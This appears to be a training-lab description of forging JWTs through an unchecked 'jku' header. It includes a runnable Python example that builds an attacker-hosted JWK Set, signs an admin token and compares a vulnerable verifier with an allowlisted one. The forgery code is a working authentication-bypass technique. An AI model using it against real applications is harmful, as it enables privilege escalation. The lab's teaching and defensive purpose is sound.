This exercise covers how to use the `jku` header to bypass JWT-based authentication.

1-2 Hrs.
Green Badge


This lab focuses on the `jku` (JWK Set URL) header of a JWT, which lets the token's header carry a URL pointing to the public key that should be used to verify it. The primary objective is to forge a token that grants admin privileges. The exercise highlights what happens when an application trusts whatever URL the `jku` header contains: an attacker can point it at a JWK Set they host, containing their own public key, and sign the token with the matching private key, so the signature verifies against a key the attacker chose.

By following this exercise, you will learn to create an RSA private key with `openssl`, extract the public components (n and e) from it, populate a JWK file with them, and sign the token with RSA using that private key. This exercise demonstrates that even a signed payload can be exploited if the server never checks where the verification key comes from.
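The whole chain described above, as an added example that is not PentesterLab's code or the lab's solution: generate an RSA key, publish its n and e as a JWK Set, mint an RS256 token whose `jku` points at that set, and watch a verifier that blindly follows `jku` accept it. Everything is Python standard library; the key generation and PKCS#1 v1.5 signing are written out by hand in place of `openssl` so the script runs offline. The hostnames (`app.example`, `attacker.example`), the `kid` value `k1`, the claims and the dict standing in for HTTP fetches are all constructed for the example. The allowlist in `verify_token` is one possible fix, added here; the page itself only says "proper checks".

```python
"""Added example: forge a JWT through an attacker-controlled `jku`, then the check that stops it.
Stdlib only; RSA keygen and PKCS#1 v1.5 (RS256) signing are hand-rolled so it runs offline."""
import base64
import hashlib
import json
import secrets
from urllib.parse import urlparse

def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))

def is_probable_prime(n: int, rounds: int = 32) -> bool:  # trial division, then Miller-Rabin
    for p in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37):
        if n % p == 0:
            return n == p
    d, r = n - 1, 0
    while d % 2 == 0:
        d, r = d // 2, r + 1
    for _ in range(rounds):
        x = pow(secrets.randbelow(n - 3) + 2, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True

def gen_prime(bits: int) -> int:
    while True:
        cand = secrets.randbits(bits) | (1 << (bits - 1)) | 1  # exact width, odd
        if is_probable_prime(cand):
            return cand

def gen_rsa(bits: int = 1024) -> dict:  # stand-in for `openssl genrsa`
    e = 65537
    while True:
        p, q = gen_prime(bits // 2), gen_prime(bits // 2)
        phi = (p - 1) * (q - 1)
        if p != q and phi % e:  # e is prime, so phi % e != 0 means gcd(e, phi) == 1
            return {"n": p * q, "e": e, "d": pow(e, -1, phi)}  # n, e public; d private

def public_jwk(key: dict, kid: str) -> dict:  # what goes in the attacker's hosted JWK Set
    enc = lambda v: b64url(v.to_bytes((v.bit_length() + 7) // 8, "big"))  # base64url, no padding
    return {"kty": "RSA", "use": "sig", "kid": kid, "n": enc(key["n"]), "e": enc(key["e"])}

def _emsa_pkcs1_v15(msg: bytes, k: int) -> int:
    t = bytes.fromhex("3031300d060960864801650304020105000420") + hashlib.sha256(msg).digest()  # SHA-256 DigestInfo
    return int.from_bytes(b"\x00\x01" + b"\xff" * (k - len(t) - 3) + b"\x00" + t, "big")

def rs256_sign(key: dict, msg: bytes) -> bytes:
    k = (key["n"].bit_length() + 7) // 8
    return pow(_emsa_pkcs1_v15(msg, k), key["d"], key["n"]).to_bytes(k, "big")

def rs256_verify(jwk: dict, msg: bytes, sig: bytes) -> bool:
    n = int.from_bytes(b64url_decode(jwk["n"]), "big")
    e = int.from_bytes(b64url_decode(jwk["e"]), "big")
    k = (n.bit_length() + 7) // 8
    return len(sig) == k and pow(int.from_bytes(sig, "big"), e, n) == _emsa_pkcs1_v15(msg, k)

def make_token(key: dict, kid: str, jku: str, claims: dict) -> str:
    """Sign header.payload with `key`; the jku value is whatever the signer chooses to put there."""
    compact = lambda obj: b64url(json.dumps(obj, separators=(",", ":")).encode())
    signing_input = compact({"typ": "JWT", "alg": "RS256", "kid": kid, "jku": jku}) + "." + compact(claims)
    return signing_input + "." + b64url(rs256_sign(key, signing_input.encode()))

def verify_token(token: str, fetch_jwks, trusted_jku_hosts=None) -> dict:
    """Server side. None = follow any jku (the lab's bug); a set = only https URLs on those hosts."""
    h_b64, p_b64, s_b64 = token.split(".")
    header = json.loads(b64url_decode(h_b64))
    if header.get("alg") != "RS256":
        raise ValueError("unexpected alg")
    url = urlparse(header["jku"])
    if trusted_jku_hosts is not None and (url.scheme != "https" or url.netloc not in trusted_jku_hosts):
        raise ValueError("untrusted jku: " + header["jku"])
    keys = [k for k in fetch_jwks(header["jku"])["keys"] if k.get("kid") == header.get("kid")]
    if not keys or not rs256_verify(keys[0], f"{h_b64}.{p_b64}".encode(), b64url_decode(s_b64)):
        raise ValueError("bad signature")
    return json.loads(b64url_decode(p_b64))

def demo() -> dict:
    """Hosts, URLs and claims are constructed for this example; the 'web' is a dict lookup."""
    server_key, attacker_key = gen_rsa(), gen_rsa()
    web = {"https://app.example/jwks.json": {"keys": [public_jwk(server_key, "k1")]},
           "https://attacker.example/jwks.json": {"keys": [public_jwk(attacker_key, "k1")]}}
    forged = make_token(attacker_key, "k1", "https://attacker.example/jwks.json", {"user": "admin", "role": "admin"})
    out = {"vulnerable_role": verify_token(forged, web.get)["role"]}  # no allowlist: forgery accepted
    try:
        verify_token(forged, web.get, {"app.example"})
        out["hardened"] = "accepted"
    except ValueError as err:
        out["hardened"] = str(err)
    return out
```

Calling `demo()` returns the forged token's `role` as accepted by the unchecked verifier, and the rejection message from the allowlisted one. Two caveats on the fix: matching `jku` against an allowlist of hosts only helps if nothing on those hosts lets an attacker place or redirect to content of their choosing (an upload endpoint or open redirect on `app.example` would reopen the hole), and the simpler design is to ignore `jku` entirely and fetch keys from a URL configured server-side, using the token only to select a `kid` within that set.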
